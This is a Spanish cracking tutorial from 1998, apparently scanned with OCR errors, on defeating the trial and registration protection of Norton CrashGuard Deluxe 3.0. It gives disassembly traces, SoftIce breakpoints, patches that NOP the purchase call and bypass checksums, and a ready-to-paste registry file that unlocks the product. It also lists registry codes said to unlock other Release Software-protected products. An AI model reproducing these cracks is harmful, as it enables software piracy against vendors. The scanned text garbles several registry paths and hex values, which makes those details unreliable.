4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Mr.PinK € WKT ( WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 
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MORALEJA 


INTRODUCCION 


¡Saludos Familia! 


Bastante tiempo desde mi último artículo, lo sé, pero ya estamos de vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un poco 
de teoría y lo aprendido lo aplicaremos al programa Norton CrashGuard Deluxe 3.0 desde dos puntos de vista, el temporal y el de la password pa 


registrarse. 


TIPOS DE PROTECCIONES TEMPORALES. 


Demos un peque repaso a los diferentes esquemas de protección temporal que nos podemos encontrar (recomiendo la lectura del Capítulo 4.1 de 
+0RC) 


- CINDERELLA. El programa funciona durante una cierto periodo de días (digamos 15 días) comenzando desde la fecha de instalación. 


- BEST_BEFORE. El programa funciona durante una cierto período de tiempo independientemente de la fecha de instalación. El programa caduca 
el 30/12/97. 


- COUNTDOWN. El programa funciona sólo durante unos minutos o unos segundos. 


- QUIVER. El programa funciona sólo durante un número determinado de ejecuciones. Realmente no es una protección temporal, pero su esquema 
de protección se parece mucho al de los otros tres tipos. 


UN POCO DE TEORÍA 


Analizemos como funciona una protección temporal. 


Los "inteligentes programadores" ofertan sus productos completos al público con ridículas protecciones. 
Le colocan una fecha de caducidad, pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo las grandes compañías como Micro$oft, 
Corel, o Symantec. 


La idea es distribuir masivamenete sus productos aprovechando los estupendos canales de distribución que ofrecen las revistas de Soft. Una vez 
inundado el mercado, el usuario disfrutará del producto, se acostumbrará a él, hasta que le sea indispensable y tenga que comprarlo a un precio 
desorbitado . Esta táctica no es nueva, sino preguntad a algún camello, o como la CIA distribuyo la heroína entre el Black Power. 


Pensemos un poco. ¿Cómo conoce el programa que ya ha caducado el período de evaluación?. 

Supongamos que tenemos una evaluación e 15 días e instalamos nuestro programa el 1 de febrero. 

Sumando la fecha de instalación (1 Febrero) más el período de prueba se obtiene la fecha de caducidad: 15 febrero (El día en el que lo instalas cuenta 
como día hábil). 

El programa, lo primero que calcula es si la fecha actual es menor o igual que la fecha de caducidad, y en tal caso, se ejecuta normalmente. 

Si es mayor, dará un bonito mensaje ''El período de evaluación ha expirado". 


Una cosa está clara, el programa debe guardar alguna de las dos fechas siguientes (o las dos): 
A - Fecha de Instalación y el período de evaluación. 
B - Fecha de caducidad. 


Lo normal es la opción B. Al instalarse el programa, se calcula la fecha de caducidad y se guarda en algún sitio. Normalmente se guarda en el 
registro del sistema bajo algún nombre estúpido, aunque se puede guardar en el win.ini, system.ini, fichero oculto, o algún fichero que parezca 
inofensivo. Lo cierto es que debe guardarlo. 


Existe una variante, y es que la fecha de caducidad esté dentro del ejecutable. Un ejemplo lo tenemos en la evaluación del Hotmetal 4.0., del tipo 
BEST_BEFORE, que dentro de su ejecutable aparecía 31/12/97. Madre de Mitra, qué estúpidos pueden llegar a ser los zombi-programadores. 
Dependiendo de la pericia del programador la fecha de caducidad puede estar o no encriptada para ocultarla de la vista del usuario y para que sea 
difícil modificarla. Resumiendo, el programa debe guardar la fecha de caducidad y comprobarla al inicio del programa con la fecha actual. 


Ya sabemos de donde saca la fecha de cadudidad, pero, ¿de dónde saca la fecha actual?. Normalmente (el 99% de las veces) se extrae con una 
llamada a la función getlocaltimeo o getsystemtime. Pero se puede extraer viendo la fecha de algún fichero que se modifique periódicamente como el 
system.dat o el bootlog.txt. 


Los puntos de ataque a este esquema son claros: 


- Atacar en el cálculo de la fecha de caducidad. 
En vez de sumar 15 días sumamos 15 siglos. Esta aproximación es difícil por que el cálculo se realiza una única vez, generalmente en la instalación. 


- Modificar la fecha de caducidad. 
Si la fecha está encriptada, necesitaríamos construir un algoritmo de encriptación para la nueva fecha que deseemos introducir. Por lo que en 
general, puede ser complicado. 


- Forzar la caducidad del programa. Se analizan los mensajes que da el programa y a partir de ellos se le sigue la pista hacia atrás. Es una táctica 
muy utilizada. 


- Atacar en la comprobación de la fecha actual y la fecha de caducidad. Simplemente modifica la comprobación para que siempre estemos en el 
período de evaluación. Esta es una opción elegante. 


Alguien podría pensar que si se echa pa trás el reloj de W95, la protección temporal se elimina. Para evitar esta '"'trampilla", los programadores 
colocan código como el siguiente: 


SI está activada la marca de caducidad ENTONCES el programa ha caducado y se finaliza el programa 
DE LO CONTRARIO SI fechaActualfechaCAducidad ENTONCES activar marca de caducidad 


Como veis si os pasais de la fecha de caducidad, se activa una marca que impedirá que se ejecute el programa aunque modifiquéis el reloj. Esta 
marca se guarda en los mismos sitios donde se guarda la fecha de caducidad. 


A veces, la protección temporal queda eliminada introduciendo una palabra clave, por lo que a veces es más rápido atacar por la password. 


Para averiguar el fichero que contiene la protección temporal, se puede usar el Softlce y poner un bpx getlocaltime, o bien una nueva técnica, muy 
útil no sólo para protecciones temporales. 
Veámosla. 


EN BUSCA DE LA FRASE MÁGICA 


Todos los mensajes de un programa, los de error, los de felicitación, los de aviso, no son más que cadenas de caracteres que deben de residir en un 
fichero. Para protecciones temporales es útil buscar mensajes como 'expire', 'demo", 'evaluation'. Si localizamos estos mensajes habremos localizado, 
generalmente, el fichero que contiene la protección y podemos desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con buscar los 
mensajes 'unregistered', 'register' para localizar el programa con la protección en esquemas por palabra clave. Recomiendo una herramienta 
excelente para buscar cadenas, es el programa sr32.exe, Search € Replace for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajáoslo y 
crackearlo, tiene una bonita y sencillota protección del tipo CINDERELLA. 


EL REGISTRO DEL SISTEMA 


El Registro del Sistema no es má que un fichero gigante (system.dat) donde W95 y el esto de los programas dejan sus miserias, osea, sus variables, 
sus parámetros de configuración, su fecha de caducidad, sus marcas de caducidad. Muchos cracks sólo necesitan modificar adecuadamente el 
system.dat Es muy conveniente que le echéis un vistazo, aprenderéis mucho y podréis modificar muchos de los parámetros del Windoze. Para editar 
el registro, se utiliza normalmente el programa regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo que lo ejecutéis con el 
parámetro /v ,osease, c:1windowsregedit /v 


COMO CRACKEAR Norton CrashGuard Deluxe 3.0 


Objetivo: Norton CrashGuard Deluxe 3.0. 
Versión: 3.0 

Nombre del ejecutable: ncgd3w95.exe 
Website: http://www.symantec.com 
Tamaño del ejecutable: 11.964.671 bytes. 
Tipo de protección: Cinderella. 
Dificultad: Medio. 

Tiempo de crackeo: 2 horas. 
Herramientas: W32dasm8.X, Softlce. 


En esta ocasión, nuestro objetivo es una gran y abominable compañia, la Symantec y uno de sus muchos y abominables producto: Norton 
CrashGuard Deluxe 3.0 Básicamente, el programa consigue, en algunas ocasiones, que las aplicaciones que se cuelgan no bloqueen al Windoze. Cosa 
de agradecer dado el alto índice de siniestralidad de las aplicaciones y del propio Windoze. Además de tener una B.D de información sobre el PC, 
una antivirus ... Se protege con protección temporal CINDERELLA de 30 días. 


PRIMERA EXPLORACIÓN 


Instalamos el programa y antes de finalizar la instalación ya nos pide que nos registremos, mal asunto, quieren cobrar antes de que probemos su 
producto, su codicia de palpa ante incluso de ver el programa. 


Una vez instalado, nos ha metido a escondidas varias cosas: 


- Una DIl con un extraño nombre: 30vfv6vn.sys situada en el raiz de la unidad c: El nombre varía en cada instalación, sólo permanece fijo *fv6vn.sys, 
los 3 primeros caracteres son variables. Sospecho que sólo es un indicador para ver si el programa ya ha sido instalado. 


- Una aplicación en el arranque del Windoze Norton CrashGuard Deluxe Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicación por dos 
veces con el nombre de checkup Su misión es detectar cualquier cambio en el reloj del sistema para bloquear inmediatamente la aplicación si nos 
pasamos de la fecha de caducidad. 


Además se crean dos directorios Norton CrashGuard y Norton CrashGuard Deluxe y nos aparece un bonito icono en el escritorio del Windoze con 
forma de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si fuera poco, dos iconos en la barra de tareas, la aplicación 
propiamemte dicha (escudo gris con una N en azul) y una historia de los cuelges de los programas (un reondel con una marca de verificación). 


Si pulsamos en el icono del escritorio nos aparece una ventana donde nos dice que nos compremos INMEDIATAMENTE la aplicación a un precio 
fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el número de días que restan para el programa deje de funcionar. Además 
aparecen unos bonitos botones en los que nos podemos registrar por Internet, probar el producto o cancelar. Si probamos el producto, aparece la 
ventana principal con todas pas opciones. Si elegimos la opción de registro, aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta 
de crédito. 


PRIMERA SORPRESA 


El sistema de pago no es de la propia Symantec, sino de la empresa Release Software Corporation:http://www.releasesoft.com) y su programa 
SalesA gen. Es la primera vez y veo que Symantec no controle todos los aspectos de una aplicación. 


SEGUNDA SORPRESA 


El fichero a estudiar es el Norton CrashGuardicgmain.exe (229.376 bytes) por una simple razón, tiene el único fichero que tiene el icono que el del 
programa principal que aparece en la barra de tareas. Pero, en el mismo directorio aparece un extraño fichero llamado cgmain.dl_ (743.936 bytes). 
Mu raro, una librería aparentemente comprimida (y por tanto no utilizada) con un tamaño más grande que el ejecutable. Por que no está 
descomprimida la librería, ¿quizás por que no estamos registrados? :-) Además aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu 
parecido al fichero del programa que estamos analizando cgmain.exe y tiene un icono que tiene las letras RS, que curioso, justo las Iniciales del la 
empresa que dedica a comercializar el producto: Release Software. Si intentamos ejecutar cgmaipop.exe aparece que está preparando el Software. 
PREPARANDO?, ¿es que hay que precalentar los programas antes de instalarlos?. Luego aparece un mensaje de error indicando que no podemos 
ejecutar la aplicación, ¿quizás por que no estamos registrados? :-) 


Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un nombre muy parecido al de la aplicación que queremos estudiar y 
aproximadamente con el mismo tamaño. Y el colmo, en el otro directorio, donde reside el menú de la aplicación Norton CrashGuard 
DeluxelCGDeluxe.exe aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll. Análogamente para Norton CrashGuard 
Deluxeicheckup.exe (el programa de testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll 


Todo esto huele a chamusquina, seguro que estos ficheros tienen algo que ver a la hora de registrar el programa, y como veremos en la segunda pate 
del artículo, tienen que ver y MUCHO. 


LA APROXIMACIÓN DIFÍCIL 
AL ATAQUEEEEEEEEEEEEEE 


Podríamos analizar esos extraños ficheros que han aparecido, y lo haremos en la segunda parte del artículo. Ahora atacaremos formalmente a 
Norton CrashGuardiegmain.exe para analizar su esquema CINDERELLA de 30 días. 


Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5) 
Name: GetLocalTime . Bien, bien, asi que, aparentemente, está usando la tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza, 


estaremos en plena rutina de comprobación de fecha: fechaA ctual>fecha de caducidad? 


Solamente aparece la función getlocaltime que es utilizada una vez en el programa(¿por qué lo ponen tan fácil?) 


* Referenced by a CALL at Addresses: 
| :0040D5B4 , :0040DA44 , :0040DD3F'; La rutina es llamada 3 veces 


:0041E200 81ECCC000000 sub esp, 000000CC 
:0041E206 8D442410 lea eax, dword ptr [esp+10] 
:0041E20A 50 push eax 


* Reference To: KERNEL32.GetLocalTime, Ord: 00F5h 


1 

[1:0041E20B FF15BC544400 Call dword ptr [004454BC] 
:0041E211 8D4C2400 lea ecx, dword ptr [espl 
:0041E215 51 push ecx 


|[* Reference To: KERNEL32.GetSystemTime, Ord:0135h 


:0041E216 FF15B8544400 Call dword ptr [004454B8] 


Además aparece la llamada tambien a GetSystemTime. 


Tras la llamada a GetSystemTime los valores de año, mes, día.,.... son extraídos de la pila y guardados en los registros :0041E21 mov dx, word ptr 
[esp+0A] De los registros pasan a unas variables globales :0041E2AA mov dword ptr [0042F7F0], edx 


Recordad, cualquier posición de memoria fija como [0042F7F0], es utilizada como variable global por el programa. Despues se reintroducen en la 
pila el año, el mes, el día.,.... y se llama a la rutina :0041E310 call 00423420. 


En esta rutina es donde se realiza la encriptación de la fecha,al finalizar, devuelve en eax la fecha encriptada y además de guardarse en :0041E323 
mov dword ptr [ecx], eax 


Es más, las tres llamadas a :0041E200 obtendrán en eax la fecha encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo como es la 
rutina de encriptación. Simplemente decir que utiliza la siguiente fórmula : 


t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+ 
(secondsDay*daysMonth[month])+(secondsY ear*(year-1900))+(secondsDay*(((year-1900)-1)/4)); fin=(t+fix Value); 


Siempre es más fácil comparar un número que comparar años, días, meses,... por eso la fecha se transforma en un número. He construido un 
pequeño programa NORTON.EXE en C que realiza todo el proceso de encriptación de la fecha. Este programa esta incluido con la version en 
formato *.doc de este texto. Los fuentes de estos programas puedes bajarlos aqui. 


Bien, lo lógico, es que una vez encriptada la fecha se compruebe con la fecha de caducidad que debe estar encriptada. Si analizamos las tres llamadas 
a :0041E200 tenemos: 


* La llamada desde :0040D5B4, se limita a guardar la fecha encriptada :0040D641 mov dword ptr [esi+000002AC], eax 


1* La llamada desde :0040DA44, :0040DD3F hacen prácticamente lo mismo, mueven la fecha encriptada que estaba en eax a un registro, hacen una 
llamada a call 40DC40 y despues comprueban la fecha encriptada con [edi+00000284] 


En concreto para la llamada desde :0040DD3F 


:0040DD4B mov ebx, eax 

:0040DD62 push ebx 

:0040DD63 call 0040DC40 

:0040DD7B cmp dword ptr [edi+00000284], ebx 
:0040DDBF ja 0040DDE4 


En concreto para la llamada desde :0040DA44 


:0040DA 54 mov edi, eax 

:0040DASF push edi 

:0040DA60 call 0040DC40 

:0040DAB2 cmp dword ptr [ebx+00000284], edi 
:0040DABS ja 0040DACE 


Esto suena a una doble comprobación temporal, serán desconfiados estos chicos. 


¿Pero que hace la llamada a call 0040DC407, para ello cerramos el cgmain.exe: botón derecho sobre el icono de la N y el escudo y exit. Abrimos el 
loader del Softice y seleccionamos Norton CrashGuardicgmain.exe y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice, 
pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el 
programa y prestamos atención a ebx que es el que contiene la fecha encriptada. 


La llamada a call 0040DC40 simplemente realiza la siguiente comprobación 


:0040DC56 cmp edx, eax; compara fechaAnterior,fechaActual 
:0040DC58 ja 0040DC64; Salta si eres un mal chico. 


fecha Anterior es la fecha encriptada el la que se arrancó por última vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200. Es 
una simple comprobación para ver si hemos echado para atrás el reloj. 


La comprobación 


cmp dword ptr [ebx+00000284], edi; Análogamente cmp dword ptr [edi+00000284], ebx 
ja 0040DACE; Análogamente ja 0040DDE4 Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el período de prueba. 


LA FECHA DE CADUCIDAD 


La pregunta es, ¿de donde se guarda la fecha de caducidad encriptada? .Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha 
de encriptación se guarda en el registro del sistema y es recuperada por la llamada a la función :40BD89 RegqueryValueEXA. En concreto, se 


guarda en HKEY_CLASSES_ROOTWUItxfilllFormadAMSHAEZDO( write 


En mi caso, el valor de write es: 


01 02 03 04 05 06 07 08 


01 00 00 00 05 B7 FF FF F8 
02 00 00 00 00 00 00 10 00 
03 08 00 00 00 08 00 00 00 
04 00 00 00 06 B3 36 71 Al 
05 FB Or 81 A5 20 80 00 06 


06 B7 9F A9 AO 00 00 00 00 
07 00 00 00 06 B3 36 71 AO 
08 C3 28 00 00 18 00 00 00 
09 00 00 00 00 00 


La fecha de caducidad está en write(5,7) hasta write(6,5) ambos inclusive. Lo curioso, es que la fecha está codificada, por ejemplo si la fecha de 
caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La rutina de encriptación está en :40C0D6 y se basa en la operación or 


:0040C0D6 8A18 mov bl, byte ptr [eax] 
:0040C0D8 8A11 mov dl, byte ptr [ecx] 
:0040C0DA CO0OE305 sh1l b1, 05 

:0040C0DD 48 dec eax 

:0040C0DE COEAO3 shr dl, 03 

:0040C0E1 49 dec ecx 

:0040C0E2 OADA or bl, dl 

:0040C0E4 4E dec esi 

:0040C0E5 885101 mov byte ptr [ecx+01], dl 
:0040C0E8 885901 mov byte ptr [ecx+01], bl 


He creado dos programas DECODE que decodifica el valor de write y CODE que codifica un valor de fecha para introducirlo en write. 


CHECKSUMS PARAINOCOS 


Los puntos de ataque son claros 


1.- Parchear las comprobaciones en el ejecutable. 
2.- Introducir una fecha caducidad en el año 30000. 


1.- Si parcheamos el programa, se produce un error tan gordo que se casca windows. Esto se puede deber a que hemos crackeado mal obien exite un 
checksum. Para salir de dudas, basta con modificar alguna cadena de caracteres del ejecutable original Por ejemplo ''not be run in DOS mode" lo 
pasamos a ''not be RUN in DOS mode", si se casca es que hay un checksum, como en este caso. 


Un checksum es una comprobación para ver si el ejecutable se ha modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y 
guardando este valor algún sitio (ejecutable, registro del sistema). El programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba 
la suma con el valor que tenía guardado. Si hay algún problema es que un virus o un cracker ha modificado el programa y esto nunca es bueno para 
el programador. 


En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos 
parecía tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe encriptados (de ahí que tuvieran un tamaño tan parecido ambos ficheros). La 
rutina de checksum,simplemente consiste en coger de 16 en 16 los bytes del cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero 
cgmaitky.dll. Si existe alguna diferencia se produce un error de protección general y se casca todo. 


Para complicarlo todo, las rutinas de comprobación (ver si los 16 bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no están metidas en 
un bucle, sino que estan a lo extenso. Es decir, hay una rutina de comprobación para los 16 primeros bytes, otra disinta para los 16 siguientes. Si 
queremos parchear el checksum, habrá que modificar unas 30 comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al checksum 
:0040862D jne 00408695 si obligamos a saltar siempre, evitamos el checksum. PERO, ¿POR QUE EXISTE UN FLAG PARA EVITAR EL 
CHECKSUM?, ¿es que el programa cgmain.exe va a modificarse? Como veremos más tarde, así ocurrirá. 


2.- Con el programa NORTON se crea la fecha de caducidad que queremos, con el programa CODE se encripta y ya sólo hay que introducir el 
resultado en HKEY_CLASSES_ROOTUItxfilelFormaiMSHAEZDO(C write en las posiciones write(5,7),write(6,5) 
|¡CHECKSUMS HASTA EN LA SOPA 


Cuando la fecha de caducidad ha vencido, el programa deja de funcionar parcialmente, si analizamos el porqué descubrimos que el byte 
[esi+00000568] controla todo el meollo. En concreto, 


Si [esi+00000568] = 02 You cannot Run this Application 

Si [esi+00000568] = 20 Your computer application source has changed 
Si [esi+00000568] = 08 Your free trial period is over 

Si [esi+00000568] = 04 OK 


Pero, ¿¿cómo se rellena este byte?. Siguiendo la pista hacia atrás descubrimos que se carga a partir de 
HKEY_CLASSES_ROOTWUItxfillA Forma MSHAEZDOCVopen 


00 01 02 03 04 05 06 07 1 00 00 00 00 30 00 00 00 2 00 00 00 00 00 00 10 00 3 08 08 00 00 20 00 00 00 4 00 00 00 00 00 00 00 00 


En concreto de write(3,4). Hay que tener cuidado por que está encriptado, así que hay que utilizar el programa DECODE. Osea , si en write(3,4)=20 
indica que al desencriptarlo [esi+00000568]=4. Si write(3,4)=40 la fecha de caducidad ha vencido. 


Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el programa replica diciendo que hemos trampeado los recursos. ¿QUE PASA 
AQUÍ?. 


Mu facil, HAY UN CHECKSUM en la sección HKEY_CLASSES_ROOTWUItxfilelFormatMSHAEZDOCopen. Estos es paranoico, un checksum en 
el propio registro del sistema. En concreto, el checksum está en write(1,4). Se deja como ejercicio localizar y destruir este checksum. 


LA MISMA PROTECCIÓN EN TODOS SITIOS 


Aunque parezca increíble, los ficheros CGDeluxe.exe y CheckUp.exe tienen exactamente la misma protección que cgmain.exe y además en los 
mismos offset, osea en las mismas direcciones de memoria. Esto es extremadamente extraño, así que adoptaremos otra vía de ataque. 


LA APROXIMACIÓN FÁCIL 
Veamos lo que tenemos: 


- Unos ficheros extraños asociados a los ficheros importantes. Sabemos la función de uno de ellos los *tky.dll sirven de checksum, pero y el resto para 
que sirven? 


- Un flag que desactiva el checksum del ejecutable. 

- Unos misteriosos fichero ejecutables con el logo RS que dicen que tiene que prepara el Sotware. 
Nos centraremos en los ejecutables con los logos RS. 

REUNIENDO LAS PIEZAS 


Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero, CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una librería de un gran 
tamaño , CGDeluxe.dl_,y un ejecutable CGDelpop.exe que ''prepara el Software". 


No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara" de alguna forma CGDeluxe.dl_ para aportar toda la funcionalidad a 
CGDeluxe.EXE. Esta "preparación" sólo se realiza cuando estamos registrados. 


Por tanto, se parte de un archivo ejecutable de un tamaño inferior a la versión completa del programa. Una vez realizado el proceso de compra se 
activa otro ejecutable que convierte la versión de prueba en versión completa . 


Todas las demás utilidades que acompañan al Norton CrashGuard Deluxe tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_, 
Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll) 


LA COMPRA VIRTUAL 


Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en nuestra ''Primera Aproximación" : Doble click en el escudo con la N que 
hay en el escritorio y al pulsar el botón Buy Now (comprar ahora) aparece el asistente de compra. 


Este será nuestro punto de entrada. Si pensamos un poco observaremos que la aplicación que lanza el proceso de compra debe saber si la compra ha 
tenido éxito o no. Por tanto, será por aquí por donde centremos nuestros esfuerzos . Además debe de anunciar de alguna forma al resto de utilidades 
que la compra ha tenido éxito para que ellas también se ''preparen'' Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el icono 
del escritorio) y observaremos como ''compra”. 


Nada mejor que usar un desensamblador para investigar el programa CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso 
de la librería comercial RSAGNT32.DLL (encargada de realizar la compra virtual) y que existen un referencias a funciones tales como SAlnitialize, 
startSalesAgent. Estas van a ser nuestras funciones de aproximación. 


| 
¡Pulsamos en el botón de Imported Functions (Imp Fn) y hacemos doble click en la línea de rsagnt32.startSalesA gent. 


¡Aparecerá en el listado lo siguiente: 


¡* Reference To: rsagnt32.startSalesAgent, Ord:000Eh 


|:00407834 E807F30000 Call 00416B40 Ñf Llamada al asistente 
:00407839 83C408 add esp, 00000008 

:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 
:00407844 742B je 00407871 


Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que nos encontramos en un bloque de código que se encarga de cargar, iniciar, 
ejecutar, terminar el asistente de compra Buscamos donde puede empezar el bloque. Y un poco mas arriba encontramos: 


111111111111 // INICIO DE BLOQUE //////////////// 
* Referenced by a CALL at Address: 
:00406752 fdesde aquí es llamado el bloque del asistente de compra 


:004077B0O A1BO07B4300 mov eax, dword ptr [00437BB0] 
:004077B5 53 push ebx 


* Reference To: rsagnt32.startSalesAgent, Ord:000Eh Ñ£ Aquí hemos comenzado la busqueda 


:00407834 E807F30000 Call 00416B40 Ñf Llamada al asistente 
:00407839 83C408 add esp, 00000008 

:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 

:00407844 742B je 00407871 

:00407846 BFE0A54300 mov edi, 0043A5E0 

:00407878 5F pop edi 

:00407879 5E pop esi 

:0040787A 5B pop ebx 

:0040787B C3 ret 


11111111111 // FIN DE BLOQUE //////////////// 


Ahora una vez que conocemos desde donde hemos llamado al bloque, usamos el menu Goto a Goto Code Location y escribimos el desplazamiento 
406752. Aquí observamos lo siguiente: 


* Possible Reference to String Resource ID=00001: "Turnkexe" 


:00406748 C705C826430001000000 mov dword ptr [004326C8], 00000001 


:00406752 E859100000 call 004077B0 f Entrada en el bloque anterior 
:00406757 66392D04254300 cmp word ptr [00432504], bp 

:0040675E 0F84F4010000 je 00406958 

|:00406764 BF34254300 mov edi, 00432534 


¡'Ummmm.... Aquí ya tenemos una bonita dirección de memoria (variable global) para usar con Softice.Pero antes añadamos la librería 
RSAGNT32.DLL. al la lista de dll que sabe manejar el Softice. 


¡Abrimos el Symbol Loader de Softice y en el menu Edita Softice Initialization SettingsaExports añadimos RSAGNT32.DLL. Abrimos el Symbol 
¡Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce: 


Bpx 406752 


Bpx startSalesA gent 


Pulsamos F5 y cuando aparezca la ventana de "Welcome to Symantec Trialware'" pulsamos sobre el botón ''Buy Now"'. Aparecer en el Softice en el 
primer breakpoint Bpx 406752 


Seguimos ejecutando, paramos en la función startSalesA gent 


lcs:00407834 E807F30000 Call rsagnt32!startSalesAgent Ññ Asistente de compra 
cs:00407839 83C408 add esp, 00000008 

cs:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 

las:00407844 742B je 00407871 Ñ si salta, has comprado 


¡Nopeamos el asistente de compra. Esto es, sustituimos la llamada por instrucciones inonfesivas. En : 00407834 90 90 90 90 90 


Si estudiamos je 00407871 y hacemos que no vaya a la dirección 407871 aparece una ventana contándonos que se ha grabado un archivo llamado 
Rslicens.txt pero esto no hace que se active el proceso de compra, este nos es el camino. 


¡Otra comparación interesante se encuentra después de la rutina de entrada al bloque 


cs:00406752 ES59100000 call 004077B0 6 Bloque anterior cs:00406757 66392D04254300 cmp [00432504], bp HBComparación Interesante cs:0040675E 
0F84F4010000 je 00406958 cs:00406764 BF34254300 mov edi, 00432534 


Cuando nos encontremos sobre la dirección cs:0040675E cambiamos el flag de cero que estará activada (Z) y la colocamos a desactivada (z). Ahora el 
programa seguirá en cs:00406764. Pulsemos F5 y veamos que ocurre. 


Ha aparecido una ventana que nos dice que esperemos mientras nuestro programa esta siendo preparado (Please wait while your software is being 
prepared). Al fin, se 'PREPARA EL SOFTWARE" 


Nota: Si el proceso anterior se repite muchas veces conviene que cerremos todos los programas que tengamos activo e incluso el mismo Norton 
Crashguard que tengamos en la barra de tareas. 


Una vez completado este proceso habremos comprado virtualmente el Norton crashguard Deluxe. 


Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y 
LICENSE.xxxxxx (números de licencia) Este proceso realizado en tiempo real con el Softice no trae ningún problema... pero a la hora de hacer los 
parches no encontraremos problemas con los checksum .Pero.. TRANQUILOS QUE TODO TIENE SOLUCION. 


MODIFICANDO EL REGISTRO 


Usaremos una herramienta muy útil para los crackers el programa Regmonitor (si no lo tienes consíguelo) .Observamos unas variables que lee el 
programa (no registrado) al principio y tenemos: 


HKCRultxfile FormaAiMSHAEZD( write /** Esta nos suena */ 
HKCRwltxfile FormadMSHAEZDCxlate 
HKCRuwltxfile Forma MSHA EZDC open /* Esta nos suena*/ 


Bien, basta comparar los valores antes y después de "preparar" el software, para darse cuenta que la única modificación la realiza en open. Cuando 
está registrado su valor es: 


HKEY_CLASSES_ROOT VultxfileAFormaAMSHAEZDCtopen 
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00 
08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00 


Esta es la forma en que se comunica al resto de utilidades que la compra ya ha tenido éxito. 
Y YA ESTA, basta con introducir este valor en el registro para que quede registrado el Norton CrashGuard Deluxe 3.0 


MSHAEZDC corresponde al programa en cuestión a comprar. Usando el regmonitor vemos que clave busca el programa a desproteger y anotamos 
el código (MSHAEZDC). 


Esta táctica se ha probado con éxito con las siguientes aplicaciones protegidas por la compañía Release Software Corporation : Norton utilities, 
Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder, 


Creando un archivo de registro ya tenemos hecho un crack no destructivo ya que no modifica ningún ejecutable. 


REGEDIT4 

; (c) ESTADO+PORCINO 1998 

; Modificación de registro para Norton Crash Guard Deluxe 
; Mr.Red € otras hierbas 


[HKEY_CLASSES_ROOTXultxfilelFormatiMSHAEZDC] 
"open"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00,00,00,00,00,00,00,00,00,00,00 


| E A q q AAA Cortar por AQUÍ q q q q A A 


Para los demás programas que usan esta protección tenemos: 


Xing MPEG Encoder códigoá MSHVEMAV 
Norton Utilities códigoa MSHVEMO0OE 

Norton Unisntaller códigoa MSHW2EHL 
Bueno ha sido largo pero ha merecido la pena. 


MORALEJA: Si quieres poner una puerta, procura que no sea de papel. 


Es el colmo de la incompetencia. Confías la venta de tu producto a un empresa que proporciona una protección ridícula que no vende tu producto si 
no que prácticamente lo regala. Por que no invertir la millonada que Symantec habrá pagado a Release Software Corporation encontrar a unos 
buenos programadores en ensamblador que hicieran una protección decente.Además, esta compañía protege y vende productos de más empresas a 
parte de Symantec. 

Basta pasarse por su web http://www.releasesoft.com y comprobar lo orgullosos que están de sus clientes. 

Realmente, no creo que esta compañía dure mucho. 


La importancia de este artículo radica en que se ha conseguido solventar con éxito la protección de una casa de Software dedicada a proteger y 
vender. Quedan a nuestros pies cientos de programas , con una protección de papel, gracias a la incompetencia de una avariciosa compañía. Mejor 
sería que diera los programas gratis, y de dejara de hacer el ridículo. 


Mr.PinK £ WKT (WHISKEY KON TEKILA ) 


